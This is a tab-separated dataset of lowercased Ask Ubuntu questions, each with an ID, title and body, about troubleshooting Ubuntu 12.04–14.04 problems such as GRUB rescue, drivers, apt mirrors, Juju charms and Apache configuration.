505287	broken grub rescue , due to corrupt linux partition , will ubuntu reinstall fix it ?	i have an acer aspire ao533 with dual boot windows 7 and ubuntu 14.04 . somehow my ubuntu partition got corrupted and can no longer be accessed.as a result when i try to boot the machine i 'm redirected to grub rescue , which i 'm pretty sure is because the required grub modules ca n't be accessed any more . after spending lot of time googling the solution i was finally able to boot into my windows installation using supergrub disk ( +1 to supergrub ! ) . now most of the solution i came across pointed towards using a windows recovery disc , but i 'm not able to create one as the netebook has no cd drive . so finally , my question is - will following procedure repair the broken grub and will allow me to boot safely into windows as well as ubuntu : 1 ) delete the linux and linux swap patitions using windows disk management utility & unallocate the corresponding space . 2 ) boot into ubuntu using a live usb . 3 ) install ubutnu on the unallocated space treating it as a fresh installation . note : please do not insist on booting through a windows recovery media , as i 've already tried getting hold of one and have failed . i 've also tried using testdisk and ddrescue in order to recover as much of my data from linux partition as possible but with no success , any suggestion in this regard will also be welcomed . update : i tried to delete the linux partitions through windows but windows crashed to blue screen of death , i do n't know what to do now.please help me guys ! ! ! !
505292	installing php-java-bridge in ubuntu 14.04 i need two servers apache and tomcat both	when i copied javabridgetemplate621.war to /var/lib/tomcat7/webapps and started the tomcat7 server and trying to go to http : //127.0.0.1:8080/javabridgetemplate621/ i 'm getting following errors . http status 500 - php.java.bridge.http.fcgiconnectexception : could not connect to server type exception report message php.java.bridge.http.fcgiconnectexception : could not connect to server description the server encountered an internal error that prevented it from fulfilling this request . exception javax.servlet.servletexception : php.java.bridge.http.fcgiconnectexception : could not connect to server php.java.servlet.fastcgi.fastcgiservlet.init ( fastcgiservlet.java:133 ) org.apache.catalina.authenticator.authenticatorbase.invoke ( authenticatorbase.java:501 ) org.apache.catalina.valves.errorreportvalve.invoke ( errorreportvalve.java:98 ) org.apache.catalina.valves.accesslogvalve.invoke ( accesslogvalve.java:950 ) org.apache.catalina.connector.coyoteadapter.service ( coyoteadapter.java:408 ) org.apache.coyote.http11.abstracthttp11processor.process ( abstracthttp11processor.java:1040 ) org.apache.coyote.abstractprotocol $ abstractconnectionhandler.process ( abstractprotocol.java:607 ) org.apache.tomcat.util.net.jioendpoint $ socketprocessor.run ( jioendpoint.java:315 ) java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1145 ) java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:615 ) java.lang.thread.run ( thread.java:744 ) root cause php.java.bridge.http.fcgiconnectexception : could not connect to server php.java.bridge.http.socketchannelfactory.test ( socketchannelfactory.java:58 ) php.java.servlet.fastcgi.fastcgiservlet.init ( fastcgiservlet.java:131 ) org.apache.catalina.authenticator.authenticatorbase.invoke ( authenticatorbase.java:501 ) org.apache.catalina.valves.errorreportvalve.invoke ( errorreportvalve.java:98 ) org.apache.catalina.valves.accesslogvalve.invoke ( accesslogvalve.java:950 ) org.apache.catalina.connector.coyoteadapter.service ( coyoteadapter.java:408 ) org.apache.coyote.http11.abstracthttp11processor.process ( abstracthttp11processor.java:1040 ) org.apache.coyote.abstractprotocol $ abstractconnectionhandler.process ( abstractprotocol.java:607 ) org.apache.tomcat.util.net.jioendpoint $ socketprocessor.run ( jioendpoint.java:315 ) java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1145 ) java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:615 ) java.lang.thread.run ( thread.java:744 ) root cause java.io.ioexception : java.net.connectexception : connection refused php.java.bridge.http.fcgiconnectexception. < init > ( fcgiconnectexception.java:37 ) php.java.bridge.http.socketchannelfactory.test ( socketchannelfactory.java:58 ) php.java.servlet.fastcgi.fastcgiservlet.init ( fastcgiservlet.java:131 ) org.apache.catalina.authenticator.authenticatorbase.invoke ( authenticatorbase.java:501 ) org.apache.catalina.valves.errorreportvalve.invoke ( errorreportvalve.java:98 ) org.apache.catalina.valves.accesslogvalve.invoke ( accesslogvalve.java:950 ) org.apache.catalina.connector.coyoteadapter.service ( coyoteadapter.java:408 ) org.apache.coyote.http11.abstracthttp11processor.process ( abstracthttp11processor.java:1040 ) org.apache.coyote.abstractprotocol $ abstractconnectionhandler.process ( abstractprotocol.java:607 ) org.apache.tomcat.util.net.jioendpoint $ socketprocessor.run ( jioendpoint.java:315 ) java.util.concurrent.threadpoolexecutor.runworker ( threadpoolexecutor.java:1145 ) java.util.concurrent.threadpoolexecutor $ worker.run ( threadpoolexecutor.java:615 ) java.lang.thread.run ( thread.java:744 ) root cause java.io.ioexception : php not found . please install php-cgi . php test command was : [ php-cgi , -v ] php.java.bridge.util $ process.start ( util.java:1145 ) php.java.servlet.fastcgi.fcgiprocess.start ( fcgiprocess.java:68 ) php.java.bridge.http.socketchannelfactory.dobind ( socketchannelfactory.java:125 ) php.java.bridge.http.fcgiconnectionfactory.runfcgi ( fcgiconnectionfactory.java:88 ) php.java.bridge.http.fcgiconnectionfactory $ 1.run ( fcgiconnectionfactory.java:109 ) note the full stack trace of the root cause is available in the apache tomcat/7.0.52 ( ubuntu ) logs . any help will be highly appriciated .
505293	installed ubuntu 14.04 along with windows 8.1 - ca n't boot ?	hi everyone i have installed ubuntu 14.04 along side windows 8.1 , with ubuntu as a separate partition . when i restart , ubuntu does n't boot , nor is it listed as bootable . how do i boot ?
505294	linker error undefined reference to symbol '__cxa_atexit ' libc_nonshared.a	i have just got involved in apache openoffice project . downloaded the source and tried to build in ubuntu 14.04 , but i 'm getting the linker error : /usr/lib/x86_64-linux-gnu/libc_nonshared.a : undefined reference to '__cxa_atexit ' symbol collect2 : ld returned symbol 1 error after doing nm on the libraries , i found out that __cxa_atexit is actually defined in libc.a which is also in the same folder as libc_nonshared.a . i 'm stuck . i do n't know why the linker could n't take libc.a . i tried adding various options , such as -lc , -wl , -- undefined=__cxa_atexit , -wl , -- start-group -wl , -- end-group but none of them is working . the source is building and linking without any problem in ubuntu12.04 .
505297	asus pce-n15 wireless adapter only connecting at 1mb/s on ubuntu 14.04	i have installed an asus pce-n15 wireless adapter on my ubuntu 14.04 install . it sees and connects easily to wireless networks , but it only connects at 1mb/s when connected to my tp-link tl-wr340g wireless router . my wireless security settings on the router are wpa2-psk with aes as the security option . the weird thing is that when i connect to my mobile phone hotspot , it connects at full speed and i can browse the internet no problem . this is the output of nm-tool | more : networkmanager tool state : connected ( global ) - device : wlan0 [ thwireless ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192ce state : connected default : no hw address : e0:3f:49:8b:89:82 capabilities : speed : 1 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) kk1690 : infra , 00:1d:0f : f0:2d:3c , freq 2437 mhz , rate 54 mb/s , strength 40 wpa
505298	how do i get access to apport crash logs ?	i develop a program that is available from the official ubuntu repositories . is it possible for me to get access to the automatic crash reports , generated with apport , and do i need do implement something in order to collect crash statistics from users ? if it is impossible to get access to ubuntus own crash logs , i am allowed to collect my own user crash logs ? what is best practice when obtaining crash logs from ubuntu users ?
505299	can not connect wireless keyboard when wakeup	i 'm using ubuntu 14.04 and a logitech k520 wireless keyboard-mouse set . occasionally , when i wake up ubuntu from suspending , i find that the mouse works but the keyboard does n't . and i find a way to work around this : first use mouse to login with guest account , then the keyboard wakes up also , and then logout the guest account and get keyboard still working . so this seems to be a bug . any available patch to fix it ?
505302	ubuntu vms with static ip address in virtualbox	i 'm a beginner in networking and try to setup multiple ubuntu vms on virtualbox for the learning purpose . for the multi-node hadoop cluster setup , i installed virtualbox in my laptop and installed ubuntu guest vm . then i cloned the ubuntu vm as another vm . then , i modified network of both vms by adding adapter # 2 with host-only option and also enabled the dhcp server option under host-only networks in the virtualbox manager preferences . then , i started both ubuntu vm and updated below things on both vms . for first vm , sudo gedit /erc/network/interfaces added the below lines and saved , auto eth1 iface eth1 inet static address 192.168.56.101 < -- - used 192.168.56.102 for 2nd vm netmask 255.255.255.0 sudo gedit /etc/hosts added the below lines after the line 127.0.0.1 localhost and deleted the line 127.0.1.1 my-laptop , 192.168.56.101 node1 192.168.56.102 node2 sudo gedit /etc/hostnale -- updated the correct host name . after these changes , i rebooted both vms , internet is not working on both and not able to do ssh also . please advise on this issue . i want to setup two ubuntu vms with static ip address and internet connectivity and need to do ssh between them .
505307	show blank screen on suspand ubuntu 14.04	i am using ubuntu 14.04 on my hp e015tx laptop which have amd redeon graphics card it show blank screen on suspend ubuntu 14.04 and laptop is not workable after this .
505308	local hard drive missing after installing ubuntu over win8	recently i installed ubuntu 14.04 over windows 8 [ not dual boot ] . previously i had two local drives c and d. but now it seems installing ubuntu has merged my both local drive and i am missing my files from local disk d. is there any way now to retrieve those files from local disk d ? thanks
505309	dell xps 15 ( l502x ) with ubuntu 14.04 blacksout	my dell xps 15 ( l502x ) with ubuntu 14.04 blacksout when i turn on the computer it gets in good , but then it starts to lag a lot , and if i start working on the terminal or even get in the browser it reboots or `` blacksout '' then it asks me to log in again , and it keeps doing the same thing on and on .
505310	juju server relation hook files are not running ?	hi this question based one this link.how do i add a relationship between two charms to pass information between them ? want to add relation to two charms.first one is server charm and other one is application charm.i have added two hooks file one for server charm and application charm.those are backend-relation-joined and server-relation-joined . in the yaml file i have add those relations as providers and require relations.but when i deploy charm it does n't run the backend-relation-joined hook and server-relation-joined hook file.these are the only hook files are running.i want to know why my relation joined hooks are not running . 2014-08-01 05:09:27 info juju.worker.uniter uniter.go:494 ran `` install '' hook 2014-08-01 05:09:27 info juju.worker.uniter uniter.go:505 committing `` install '' hook 2014-08-01 05:09:27 info juju.worker.uniter uniter.go:520 committed `` install '' hook 2014-08-01 05:09:27 info juju.worker.uniter modes.go:396 modecontinue starting 2014-08-01 05:09:27 info juju.worker.uniter modes.go:48 continuing after `` install '' hook 2014-08-01 05:09:27 info juju.worker.uniter modes.go:396 modeconfigchanged starting 2014-08-01 05:09:28 info juju.worker.uniter uniter.go:480 running `` config-changed '' hook 2014-08-01 05:09:28 info juju.worker.uniter uniter.go:494 ran `` config-changed '' hook 2014-08-01 05:09:28 info juju.worker.uniter uniter.go:505 committing `` config-changed '' hook 2014-08-01 05:09:28 info juju.worker.uniter uniter.go:520 committed `` config-changed '' hook 2014-08-01 05:09:28 info juju.worker.uniter modes.go:396 modecontinue starting 2014-08-01 05:09:28 info juju.worker.uniter modes.go:48 continuing after `` config-changed '' hook 2014-08-01 05:09:28 info juju.worker.uniter modes.go:396 modestarting starting 2014-08-01 05:09:28 info juju.worker.uniter uniter.go:480 running `` start '' hook
505312	how to track a crash when changing from x :1 to x :0 ?	i need to track on 14.04 a crash that often happens here : i open a new x at :1 ( that sometimes goes to ctrl+alt+f8 others to f9 ) . but when i try to go back to x :0 with ctrl+alt+f7 , it crashes about 30 % of the time ... the crash happens in a way that the login screen shows up again . i looked at /var/log/apport.log and found this : error : apport ( pid 769726 ) fri aug 1 00:47:56 2014 : called for pid 1457 , signal 6 , core limit 18446744073709551615 error : apport ( pid 769726 ) fri aug 1 00:47:56 2014 : ignoring implausibly big core limit , treating as unlimited error : apport ( pid 769726 ) fri aug 1 00:47:56 2014 : executable : /usr/bin/xorg ( command line `` /usr/bin/x -core :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch '' ) error : apport ( pid 769726 ) fri aug 1 00:47:56 2014 : is_closing_session ( ) : no dbus_session_bus_address in environment error : apport ( pid 769726 ) fri aug 1 00:47:56 2014 : apport : report /var/crash/_usr_bin_xorg.0.crash already exists and unseen , doing nothing to avoid disk usage dos i think the answer can be a generic crash tracking information about : xorg , xscreensaver , cpufreq and other apps that could potentially cause a crash in such virtual terminal changing situation . may be also applications related to opengl like unity . i just ensured no xscreensaver opengl hacks were running , just maze ; and a crash happened again . i lock the screen with xscreensaver , but after some time the unity default screenlocker kicks in also , so i have to login two times .
505314	do n't let anyone to ssh on my pc	when i am in a network , and others know my password , they can easily ssh on my pc . i want to log them out when ever they try to ssh on my pc . and mail that log ip to root . so what should i do , which file i have to configure to make this happen ?
505316	is this ubuntu-android blue tooth connecton ok and can i use it for debugging ?	i am able to transfer ordinary files through the connection which is attached as a picture below . 1 ) is it ok ? as you can see on top of window there is a `` connection of '' statement , is there a problem with it ? 2 ) is it a meaningful method to transfer apk file through blue tooth and install it every time i need a test and for every change that i try ? 3 ) also i must state that i have tried to use usb connection and i guess i would be able to debug applications within eclipse and my android device . is it possible , have i understand right ? 4 ) if 3 is true , can i provide a debugging wire using blue tooth between eclipse and android ? -ubuntu 14.04 -android ice cream sandwich -eclipse luna
505317	how to open word document file in terminal ?	as i 'm trying to open a word document from the terminal , i used wvware and some other commands for the same , but i could n't get it . could any one please help me out !
505321	how to periodically back up a folder on change ?	i want to achieve the following functionality in ubuntu but i dont know how to do it . i need a daemon that periodically backs up a directory , say dir to another location by doing the following : checks for the latest directory in the back up location . if not found , backs up the directory dir and renames it with the time stamp to some thing like this : dir_timestamp . if found , checks for any change of contents between dir and dir_timestamp . if there is a change , back up the directory with the new timestamp . if not do nothing wait for the specified period go back to 1 . i sort of got the algorithm , but i dont know how to do this because i have no idea about shell scripting . if this can be done it will be really useful for my research . can anyone help me out ?
505323	lpr : error - unknown option “v”	i am getting this error when trying to run the lpr command : lpr : error - unknown option `` v '' . the full command i am running is : lpr -v -p printer-1 file.txt according to the documentation here http : //manpages.ubuntu.com/manpages/saucy/en/man1/lpr.1.html there is a -v flag . if i run the command without the -v flag it prints fine , however i need output so the application i am building knows if the print was successful or not . i have tried this on ubuntu 12.04 lts and 14.04 lts . this page http : //www.linuxmanpages.com/man1/lpr.1.php says : the `` c '' , `` d '' , `` f '' , `` g '' , `` i '' , `` m '' , `` n '' , `` t '' , `` v '' , and `` w '' options are not supported by cups and will produce a warning message if used . so , is there a linux distribution that does not use cups and uses another printing system which does have a verbose flag ?
505324	skype 4.3.0.37 typing is slow on ubuntu 14.04	i recently installed the latest skype from their website 4.3.0.37 , on my ubuntu laptop , ( 14.04 ) lts . ( from the debian package skype-ubuntu-precise_4.3.0.37-1_i386.deb ) and after a couple days , it turned slow on me.. when i type in the chat box , there is a serious lag , but not always . so , for example i can type `` this is a test '' and when i look down on the window it only says `` this '' and after a second or two `` is a '' appears then `` test '' . there is almost no load on the pc , nothing much else is running on the machine . i can not see anything in syslog , or anywhere . do you have any suggestion where i can look for error logs , how to turn on more logging , or if anyone have seen/fixed the same ?
505326	touchpad not working during updating	i tried to update ubuntu from 13.04 to 13.10 ( ? ) . it was said that updates for 13.04 are not available and asked if i want to update . i pressed yes . after some time the window with something related to nautilus appeared `` dropbox requires nautilus to be restarted to function properly . '' when i pressed restart the computer hung/stopped working properly and i had to reboot . when i turned it on again the touchpad didnt work and the window about nautilus was still there . i have done something to get rid of the window . the touchpad still doesnt work . the usual mouse works . and i have checked my current version of ubuntu . it is still 13.04 . so it was not updated . so it seems that i was stuck in an intermediate process .
505327	vim-latex runs evince instead of xdvi	i have installed the vim-latex plugin , which is great for editing latex documents in vim . however , i have one problem with viewing the output file . the tutorial says to use the \lv command . however , when i try that , it tries to open foo.dvi with evince , which happens to fail spectacularly : this is strange , though , since the docs say that xdvi should be the default dvi viewer in the first place . anyway , i tried setting it as the default : : let g : tex_viewrule_dvi = 'xdvi' this had absolutely no effect . when i tried : ! xdvi foo.dvi it worked perfectly , but i would prefer the easier \lv shortcut instead . how can i solve this problem ? i 'm running ubuntu 14.04 with vim 7.4 .
505329	kgraphviewer replacement	is there a replacement package for the deleted kgraphviewer ? the qt dev pacakge is installed . compilation of the latest umbrello works . also i tried to compile it from the git remake -dcmake_install_prefix=/usr/local .. -- the c compiler identification is gnu 4.8.2 -- the cxx compiler identification is gnu 4.8.2 -- check for working c compiler : /usr/bin/cc -- check for working c compiler : /usr/bin/cc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done -- looking for q_ws_x11 -- looking for q_ws_x11 - not found -- looking for q_ws_win -- looking for q_ws_win - not found -- looking for q_ws_qws -- looking for q_ws_qws - not found -- looking for q_ws_mac -- looking for q_ws_mac - not found -- found qt-version 5.2.1 ( using /usr/bin/qmake ) -- looking for include file pthread.h -- looking for include file pthread.h - found -- looking for pthread_create -- looking for pthread_create - not found -- looking for pthread_create in pthreads -- looking for pthread_create in pthreads - not found -- looking for pthread_create in pthread -- looking for pthread_create in pthread - found -- found threads : true -- found automoc4 : /usr/bin/automoc4 -- found perl : /usr/bin/perl ( found version `` 5.18.2 '' ) -- found phonon : /usr/include ( required is at least version `` 4.3.80 '' ) -- performing test _offt_is_64bit -- performing test _offt_is_64bit - success -- performing test have_fpie_support -- performing test have_fpie_support - success -- performing test __kde_have_w_overloaded_virtual -- performing test __kde_have_w_overloaded_virtual - success -- performing test __kde_have_gcc_visibility -- performing test __kde_have_gcc_visibility - success cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : qt_qt_include_dir used as include directory in directory /home/torbjorr/kgraphviewer/build/cmakefiles/cmaketmp cmake error : internal cmake error , trycompile configure of cmake failed cmake error at /usr/share/kde4/apps/cmake/modules/findkde4internal.cmake:1311 ( message ) : unable to compile a basic qt application . qt has not been found correctly . call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findkde4.cmake:95 ( find_package ) cmakelists.txt:8 ( find_package ) -- configuring incomplete , errors occurred ! see also `` /home/torbjorr/kgraphviewer/build/cmakefiles/cmakeoutput.log '' . see also `` /home/torbjorr/kgraphviewer/build/cmakefiles/cmakeerror.log '' .
505330	sun grid engine qmon not working on ubuntu 14.04 lts	hello to sun grid engine , ui , and package experts , after installing sun grid engine and trying to run the qmon graphic user interface , the system shows the following errors : warning : can not convert string `` intro '' to type pixmap warning : can not convert string `` toolbar_job '' to type pixmap warning : can not convert string `` toolbar_queue '' to type pixmap warning : can not convert string `` toolbar_submit '' to type pixmap warning : can not convert string `` toolbar_cplx '' to type pixmap warning : can not convert string `` toolbar_host '' to type pixmap warning : can not convert string `` toolbar_cluster '' to type pixmap warning : can not convert string `` toolbar_sched '' to type pixmap warning : can not convert string `` toolbar_calendar '' to type pixmap warning : can not convert string `` toolbar_user '' to type pixmap warning : can not convert string `` toolbar_pe '' to type pixmap warning : can not convert string `` toolbar_ckpt '' to type pixmap warning : can not convert string `` toolbar_ticket '' to type pixmap warning : can not convert string `` toolbar_prj '' to type pixmap warning : can not convert string `` toolbar_rqs '' to type pixmap warning : can not convert string `` toolbar_ar '' to type pixmap warning : can not convert string `` toolbar_browser '' to type pixmap warning : can not convert string `` toolbar_exit '' to type pixmap the qmon window appears yet is small and missing the buttons that are usually there . the ubuntu 14.04lts is almost a fresh install without updates . sge qmon version installed is : 6.2u5-7.3 i did try to look for other answers . you may find a similar question issue to mine in : sun grid engine 's qmon -- `` can not convert string ... '' however , the answer provided by ray regarding using son of grid engine does not seem to work for me since sge_8.1.6_amd64.deb complains on dependencies - lesstif2 ( > = 1:0.94.4 ) i know that qmon and sge worked well on a fresh install of ubuntu 12.04lts in april . since there were no changes in the package that was last changed in february . i assume that my options are either : a : roll back to ubuntu 12.04lts b : wait until there is a fix to either ubuntu or qmon c : build from source code option c seems too time consuming . option b depends if there is someone on this list who can fix this . option a seems the obvious choice , yet i rather upgrade to ubuntu 14.04lts if possible . i hope there is a simple fix . jacob
505331	apt-get update ; install apache2 : works on 1 vm , fails on another , with the same mirror config : [ not candidate version ]	setup i have 3 vms , each running 12.04 : vm0 : hosts a debmirror-built , partial ubuntu repository . vm1 & vm2 want to use that to install packages . i 've renamed /etc/apt/sources.list - > /etc/apt/sources.list.dis so that it 's not picked up ( and i do n't see the vms hitting the standard ubuntu archives during apt-get update ) , and both vms have identical identical sources.list configs ( 1 file in sources.list.d/foo.list ) the problem on one vm , i can install apache2 from my ubuntu mirror just fine , but not on the other . is there any stale apt-get state that i need get rid of ? foo.list : deb http : //my-mirror.com/repository/ubuntu/ precise main universe multiverse restricted deb http : //my-mirror.com/repository/ubuntu/ precise-security main universe multiverse restricted deb http : //my-mirror.com/repository/ubuntu/ precise-updates main universe multiverse restricted before trying to install apache2 on both vms , i ran : sudo rm -rf /var/cache/apt and sudo apt-get update vm1 works fine : me @ vm1-172-16-2-18 : ~ $ sudo apt-get install apache2 reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap ssl-cert suggested packages : apache2-doc apache2-suexec apache2-suexec-custom openssl-blacklist the following new packages will be installed : apache2 apache2-mpm-worker apache2-utils apache2.2-bin apache2.2-common libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap ssl-cert 0 upgraded , 10 newly installed , 0 to remove and 48 not upgraded . need to get 102 kb/1,857 kb of archives . after this operation , 5,686 kb of additional disk space will be used . do you want to continue [ y/n ] ? ... vm2 does n't : me @ vm2-172-16-2-17 : ~ $ sudo apt-get install apache2 reading package lists ... done building dependency tree reading state information ... done package apache2 is a virtual package provided by : apache2-mpm-itk 2.2.22-1ubuntu1.7 [ not candidate version ] apache2-mpm-worker 2.2.22-1ubuntu1.7 [ not candidate version ] apache2-mpm-prefork 2.2.22-1ubuntu1.7 [ not candidate version ] apache2-mpm-event 2.2.22-1ubuntu1.7 [ not candidate version ] apache2-mpm-itk 2.2.22-1ubuntu1 [ not candidate version ] apache2-mpm-worker 2.2.22-1ubuntu1 [ not candidate version ] apache2-mpm-prefork 2.2.22-1ubuntu1 [ not candidate version ] apache2-mpm-event 2.2.22-1ubuntu1 [ not candidate version ] e : package 'apache2 ' has no installation candidate me @ vm2-172-16-2-17 : ~ $ apt-get update did n't report any errors . how can i troubleshoot this issue ? things i 've established so far : clearly the repository is working , since 1 vm can install from it , so i think it must be something to do with apt-get on the 2nd vm but i really could n't tell what . the networking is also the same for both vms . i can curl the repository url just fine , so i do n't think it 's a firewall issue . here 's also the output of apt-get update from the broken vm : me @ vm2-172-16-2-17 : ~ $ sudo apt-get update hit http : //my-mirror.com stable release.gpg hit http : //my-mirror.com stable release.gpg hit http : //my-mirror.com precise release.gpg hit http : //my-mirror.com precise-security release.gpg hit http : //my-mirror.com precise-updates release.gpg hit http : //my-mirror.com stable release hit http : //my-mirror.com stable release hit http : //my-mirror.com precise release hit http : //my-mirror.com precise-security release hit http : //my-mirror.com precise-updates release hit http : //my-mirror.com stable/main amd64 packages hit http : //my-mirror.com stable/main i386 packages ign http : //my-mirror.com stable/main translationindex hit http : //my-mirror.com stable/main amd64 packages hit http : //my-mirror.com stable/main i386 packages ign http : //my-mirror.com stable/main translationindex hit http : //my-mirror.com precise/main amd64 packages hit http : //my-mirror.com precise/universe amd64 packages hit http : //my-mirror.com precise/multiverse amd64 packages hit http : //my-mirror.com precise/restricted amd64 packages hit http : //my-mirror.com precise/main i386 packages hit http : //my-mirror.com precise/universe i386 packages hit http : //my-mirror.com precise/multiverse i386 packages hit http : //my-mirror.com precise/restricted i386 packages ign http : //my-mirror.com precise/main translationindex ign http : //my-mirror.com precise/multiverse translationindex ign http : //my-mirror.com precise/restricted translationindex ign http : //my-mirror.com precise/universe translationindex ign http : //my-mirror.com stable/main translation-en_us ign http : //my-mirror.com stable/main translation-en hit http : //my-mirror.com precise-security/main amd64 packages hit http : //my-mirror.com precise-security/universe amd64 packages hit http : //my-mirror.com precise-security/multiverse amd64 packages hit http : //my-mirror.com precise-security/restricted amd64 packages hit http : //my-mirror.com precise-security/main i386 packages hit http : //my-mirror.com precise-security/universe i386 packages hit http : //my-mirror.com precise-security/multiverse i386 packages hit http : //my-mirror.com precise-security/restricted i386 packages ign http : //my-mirror.com precise-security/main translationindex ign http : //my-mirror.com precise-security/multiverse translationindex ign http : //my-mirror.com precise-security/restricted translationindex ign http : //my-mirror.com precise-security/universe translationindex hit http : //my-mirror.com precise-updates/main amd64 packages hit http : //my-mirror.com precise-updates/universe amd64 packages hit http : //my-mirror.com precise-updates/multiverse amd64 packages hit http : //my-mirror.com precise-updates/restricted amd64 packages hit http : //my-mirror.com precise-updates/main i386 packages hit http : //my-mirror.com precise-updates/universe i386 packages hit http : //my-mirror.com precise-updates/multiverse i386 packages hit http : //my-mirror.com precise-updates/restricted i386 packages ign http : //my-mirror.com precise-updates/main translationindex ign http : //my-mirror.com precise-updates/multiverse translationindex ign http : //my-mirror.com precise-updates/restricted translationindex ign http : //my-mirror.com precise-updates/universe translationindex ign http : //my-mirror.com stable/main translation-en_us ign http : //my-mirror.com stable/main translation-en ign http : //my-mirror.com precise/main translation-en_us ign http : //my-mirror.com precise/main translation-en ign http : //my-mirror.com precise/multiverse translation-en_us ign http : //my-mirror.com precise/multiverse translation-en ign http : //my-mirror.com precise/restricted translation-en_us ign http : //my-mirror.com precise/restricted translation-en ign http : //my-mirror.com precise/universe translation-en_us ign http : //my-mirror.com precise/universe translation-en ign http : //my-mirror.com precise-security/main translation-en_us ign http : //my-mirror.com precise-security/main translation-en ign http : //my-mirror.com precise-security/multiverse translation-en_us ign http : //my-mirror.com precise-security/multiverse translation-en ign http : //my-mirror.com precise-security/restricted translation-en_us ign http : //my-mirror.com precise-security/restricted translation-en ign http : //my-mirror.com precise-security/universe translation-en_us ign http : //my-mirror.com precise-security/universe translation-en ign http : //my-mirror.com precise-updates/main translation-en_us ign http : //my-mirror.com precise-updates/main translation-en ign http : //my-mirror.com precise-updates/multiverse translation-en_us ign http : //my-mirror.com precise-updates/multiverse translation-en ign http : //my-mirror.com precise-updates/restricted translation-en_us ign http : //my-mirror.com precise-updates/restricted translation-en ign http : //my-mirror.com precise-updates/universe translation-en_us ign http : //my-mirror.com precise-updates/universe translation-en reading package lists ... done
505333	flv to mp4 converter in trusty	anybody recommend a gui app ( preferably in ubuntu repos ) to convert from .flv to .mp4 other than transmageddon ? transmageddon now crashes in trusty .
505340	enable all http methods on apache	i have set up a completely plain apache web server ( version 2.4.7 ) on ubuntu server 14.04.1 lts . i want to enable other http methods such as put and delete for some testing purposes . i edited my /etc/apache2/apache2.conf file and added the directive < location / > < limitexcept get head post options delete put > allow from all < /limitexcept > < /location > before restarting apache . however , if i use telnet and type options / http/1.0 i do only get allow : get , head , post , options back , and not the methods i wanted such as put . what should i do to enable these methods ?
505341	changing the java runtime in netbeans 8 on ubuntu 14.04	( not sure if this is the right site for this question - if not please migrate . ) i am using netbeans 8 for c++ on ubuntu 14.04 . ubuntu comes with the open jdk runtime , which is what netbeans is currently using - see below : product version : netbeans ide 8.0 ( build 201403101706 ) updates : netbeans ide is updated to version netbeans 8.0 patch 2 java : 1.7.0_55 ; openjdk client vm 24.51-b03 runtime : openjdk runtime environment 1.7.0_55-b14 system : linux version 3.13.0-32-generic running on i386 ; utf-8 ; en_us ( nb ) user directory : /home/u111/.netbeans/8.0 cache directory : /home/u111/.cache/netbeans/8.0 but there are some problems in firefox with the jdk runtime that comes with this version of ubuntu , so i installed the sun java runtime , which fixed my firefox problems . now i would like to configure netbeans to also use the sun runtime instead of openjdk . how do i do this ?
505342	juju charm relation-joined hook not working ?	i have two charms and i want to build relationship and get details from server charm ( server charm and application charm ) .now i can add relationship.but it is not running application-relation-joined in my hooks.for my understanding after add relationships it should be run.but i have put logs to check whether relation-joined hooks are runnning or not.it is not printing log files.please anyone tell me littile bit more about after adding relationship how -relation-joined , -relation-changed , -relation-departed and -relation-broken are running .
505343	why apt-get update works but upgrade gives 403 forbidden ?	i have a working ubuntu 12.04 environment behind a proxy with all settings correct but sudo apt-get upgrade fails to work with error 403 forbidden for every server . however , sudo apt-get update works fine as the list is updated and i get a hit for every server . furthermore , all other system internet accesses work with the configured proxy server e.g . azg @ hercules : ~ $ wget -- spider http : //www.google.co.in/ spider mode enabled . check if remote file exists . -- 2014-08-01 10:21:27 -- http : //www.google.co.in/ connecting to 127.0.0.1:3128 ... connected . proxy request sent , awaiting response ... 200 ok length : unspecified [ text/html ] remote file exists and could contain further links , but recursion is disabled -- not retrieving . i also have about five other exact same ubuntu boxes and they all update/upgrade no problems . in fact , this machine with the issue is a clone of one of those working ones . how can i troubleshoot this ? would it be a missing configuration or rule in the proxy server ? update : here is the output of running sudo apt-get upgrade : reading package lists ... building dependency tree ... reading state information ... the following packages have been kept back : linux-headers-generic linux-headers-generic-lts-quantal linux-image-generic-lts-quantal the following packages will be upgraded : acpi-support compiz compiz-core compiz-gnome compiz-plugins-default cups cups-bsd cups-client cups-common cups-ppdc dbus dbus-x11 file firefox firefox-globalmenu firefox-locale-en google-chrome-stable kdelibs-bin kdelibs5-data kdelibs5-plugins kdoctools libcups2 libcups2 : i386 libcupscgi1 libcupsdriver1 libcupsimage2 libcupsimage2 : i386 libcupsmime1 libcupsppdc1 libdbus-1-3 libdbus-1-3 : i386 libdecoration0 libjpeg-turbo8 libjpeg-turbo8 : i386 libjpeg-turbo8-dev libkcmutils4 libkde3support4 libkdeclarative5 libkdecore5 libkdesu5 libkdeui5 libkdewebkit5 libkdnssd4 libkemoticons4 libkfile4 libkhtml5 libkidletime4 libkio5 libkjsapi4 libkjsembed4 libkmediaplayer4 libknewstuff2-4 libknewstuff3-4 libknotifyconfig4 libkntlm4 libkparts4 libkpty4 libkrosscore4 libktexteditor4 liblightdm-gobject-1-0 libmagic1 libminiupnpc8 libmysqlclient18 : i386 libnepomuk4 libnepomukquery4a libnepomukutils4 libplasma3 libsolid4 libtasn1-3 libtasn1-3 : i386 libtasn1-3-dev libthreadweaver4 lightdm linux-generic-lts-quantal linux-libc-dev mysql-common r-base-core r-base-dev r-cran-class r-cran-mgcv r-doc-html r-recommended thunderbird thunderbird-globalmenu thunderbird-gnome-support thunderbird-locale-en 